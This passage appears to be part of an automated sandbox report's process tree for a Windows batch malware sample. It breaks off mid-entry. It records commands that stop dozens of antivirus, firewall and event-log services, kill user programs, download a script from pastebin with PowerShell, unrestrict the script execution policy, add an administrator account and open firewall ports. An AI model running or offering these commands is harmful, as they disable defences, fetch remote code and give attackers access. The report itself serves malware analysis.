  net stop SAVScan /y
  2⤵
  PID:4256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVScan /y
    3⤵
    PID:1912
- C:\Windows\system32\net.exe
  net stop NProtectService /y
  2⤵
  PID:3344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NProtectService /y
    3⤵
    PID:3184
- C:\Windows\system32\net.exe
  net stop ccSetMGR /y
  2⤵
  PID:4736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMGR /y
    3⤵
    PID:1888
- C:\Windows\system32\net.exe
  net stop ccEvtMGR /y
  2⤵
  PID:2340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMGR /y
    3⤵
    PID:2256
- C:\Windows\system32\net.exe
  net stop srservice /y
  2⤵
  PID:4324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop srservice /y
    3⤵
    PID:1384
- C:\Windows\system32\net.exe
  net stop "Symantec Network Drivers Service" /y
  2⤵
  PID:2964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
    3⤵
    PID:1316
- C:\Windows\system32\net.exe
  net stop "norton Unerase Protection" /y
  2⤵
  PID:3404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton Unerase Protection" /y
    3⤵
    PID:3088
- C:\Windows\system32\net.exe
  net stop MskService /y
  2⤵
  PID:5000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MskService /y
    3⤵
    PID:796
- C:\Windows\system32\net.exe
  net stop MpfService /y
  2⤵
  PID:128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MpfService /y
    3⤵
    PID:1468
- C:\Windows\system32\net.exe
  net stop mcupdmgr.exe /y
  2⤵
  PID:4356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mcupdmgr.exe /y
    3⤵
    PID:4056
- C:\Windows\system32\net.exe
  net stop "McAfeeAntiSpyware" /y
  2⤵
  PID:2652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
    3⤵
    PID:1004
- C:\Windows\system32\net.exe
  net stop helpsvc /y
  2⤵
  PID:4880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop helpsvc /y
    3⤵
    PID:4804
- C:\Windows\system32\net.exe
  net stop ERSvc /y
  2⤵
  PID:3392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ERSvc /y
    3⤵
    PID:3676
- C:\Windows\system32\net.exe
  net stop "*norton*" /y
  2⤵
  PID:4260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*norton*" /y
    3⤵
    PID:1460
- C:\Windows\system32\net.exe
  net stop "*Symantec*" /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*Symantec*" /y
    3⤵
    PID:3584
- C:\Windows\system32\net.exe
  net stop "*McAfee*" /y
  2⤵
  PID:1904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*McAfee*" /y
    3⤵
    PID:4088
- C:\Windows\system32\net.exe
  net stop ccPwdSvc /y
  2⤵
  PID:2136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccPwdSvc /y
    3⤵
    PID:1224
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:4632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:5032
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:1116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:3036
- C:\Windows\system32\net.exe
  net stop "Serv-U" /y
  2⤵
  PID:3028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Serv-U" /y
    3⤵
    PID:3612
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:1616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:1176
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:5004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:1868
- C:\Windows\system32\net.exe
  net stop "Symantec AntiVirus Client" /y
  2⤵
  PID:3596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
    3⤵
    PID:3620
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Server" /y
  2⤵
  PID:656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
    3⤵
    PID:3084
- C:\Windows\system32\net.exe
  net stop "NAV Alert" /y
  2⤵
  PID:2280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NAV Alert" /y
    3⤵
    PID:4644
- C:\Windows\system32\net.exe
  net stop "Nav Auto-Protect" /y
  2⤵
  PID:3936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
    3⤵
    PID:4200
- C:\Windows\system32\net.exe
  net stop "McShield" /y
  2⤵
  PID:3148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McShield" /y
    3⤵
    PID:4476
- C:\Windows\system32\net.exe
  net stop "DefWatch" /y
  2⤵
  PID:2960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "DefWatch" /y
    3⤵
    PID:4868
- C:\Windows\system32\net.exe
  net stop eventlog /y
  2⤵
  PID:2396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop eventlog /y
    3⤵
    PID:3668
- C:\Windows\system32\net.exe
  net stop InoRPC /y
  2⤵
  PID:4424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRPC /y
    3⤵
    PID:4492
- C:\Windows\system32\net.exe
  net stop InoRT /y
  2⤵
  PID:3608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRT /y
    3⤵
    PID:3396
- C:\Windows\system32\net.exe
  net stop InoTask /y
  2⤵
  PID:1388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoTask /y
    3⤵
    PID:4132
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:2588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:1932
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:3852
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Corporate Edition" /y
  2⤵
  PID:4024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
    3⤵
    PID:2392
- C:\Windows\system32\net.exe
  net stop "ViRobot Professional Monitoring" /y
  2⤵
  PID:1984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
    3⤵
    PID:3980
- C:\Windows\system32\net.exe
  net stop "PC-cillin Personal Firewall" /y
  2⤵
  PID:5068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
    3⤵
    PID:1096
- C:\Windows\system32\net.exe
  net stop "Trend Micro Proxy Service" /y
  2⤵
  PID:3192
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
    3⤵
    PID:1048
- C:\Windows\system32\net.exe
  net stop "Trend NT Realtime Service" /y
  2⤵
  - System Time Discovery
  PID:3116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
    3⤵
    - System Time Discovery
    PID:1176
- C:\Windows\system32\net.exe
  net stop "McAfee.com McShield" /y
  2⤵
  PID:1532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com McShield" /y
    3⤵
    PID:4328
- C:\Windows\system32\net.exe
  net stop "McAfee.com VirusScan Online Realtime Engine" /y
  2⤵
  - System Time Discovery
  PID:3216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
    3⤵
    - System Time Discovery
    PID:4092
- C:\Windows\system32\net.exe
  net stop "SyGateService" /y
  2⤵
  PID:3596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SyGateService" /y
    3⤵
    PID:3184
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:4660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:2896
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus" /y
  2⤵
  PID:2344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
    3⤵
    PID:1876
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus Network" /y
  2⤵
  PID:4576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
    3⤵
    PID:4800
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Job Server" /y
  2⤵
  PID:1724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
    3⤵
    PID:4188
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Realtime Server" /y
  2⤵
  - System Time Discovery
  PID:840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
    3⤵
    - System Time Discovery
    PID:1488
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:4868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:260
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus RPC Server" /y
  2⤵
  PID:1740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
    3⤵
    PID:1732
- C:\Windows\system32\net.exe
  net stop netsvcs
  2⤵
  PID:1588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop netsvcs
    3⤵
    PID:4176
- C:\Windows\system32\net.exe
  net stop spoolnt
  2⤵
  PID:3932
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop spoolnt
    3⤵
    PID:3428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  PID:1124
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3668
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4756
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1032
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4672
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2780
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5032
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3192
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1532
- C:\Windows\system32\rundll32.exe
  RUNDLL32 USER32.DLL SwapMouseButton
  2⤵
  PID:4016
- C:\Windows\system32\tskill.exe
  tskill iexplore
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4424
- C:\Windows\system32\tskill.exe
  tskill msnmsgr
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3676
- C:\Windows\system32\tskill.exe
  tskill excel
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2156
- C:\Windows\system32\tskill.exe
  tskill iTunes
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4132
- C:\Windows\system32\tskill.exe
  tskill calc
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2332
- C:\Windows\system32\tskill.exe
  tskill msaccess
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1932
- C:\Windows\system32\tskill.exe
  tskill safari
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1516
- C:\Windows\system32\tskill.exe
  tskill mspaint
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1224
- C:\Windows\system32\tskill.exe
  tskill outlook
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1160
- C:\Windows\system32\tskill.exe
  tskill WINWORD
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3764
- C:\Windows\system32\tskill.exe
  tskill msnmsgr
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1996
- C:\Windows\system32\tskill.exe
  tskill firefox
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4936
- C:\Windows\system32\tskill.exe
  tskill LimreWire
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K 2b2crypt.cmd
  2⤵
  PID:568
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd
  2⤵
  PID:3392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:4784
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3652
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:2476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:2320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:864
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1964
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2188
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1160
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2464
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1984
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3324
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3500
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3932
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:2844
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4352
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4336
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4024
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:5036
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4736
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:864
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1740
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:916
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2416
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:2540
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2260
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4440
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:4988
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4060
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:4024
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3324
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1888
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4988
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1224
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1468
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3944
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1368
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:228
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1920
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:5036
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:3456
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1740
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:896
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3088
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:676
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1420
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:3804
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:656
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3960
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:1588
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:4348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4176
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2896
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2008
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4900
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2344
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3944
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1736
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:3500
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1412
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2896
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1388
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1744
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3820
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:3532
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:1420
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1644
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2732
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1756
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:2832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3620
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:1260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:3584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2588
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3612
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:3456
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4452
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4360
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:912
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1904
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:3640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2896
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:2352
- - C:\Windows\system32\netsh.exe
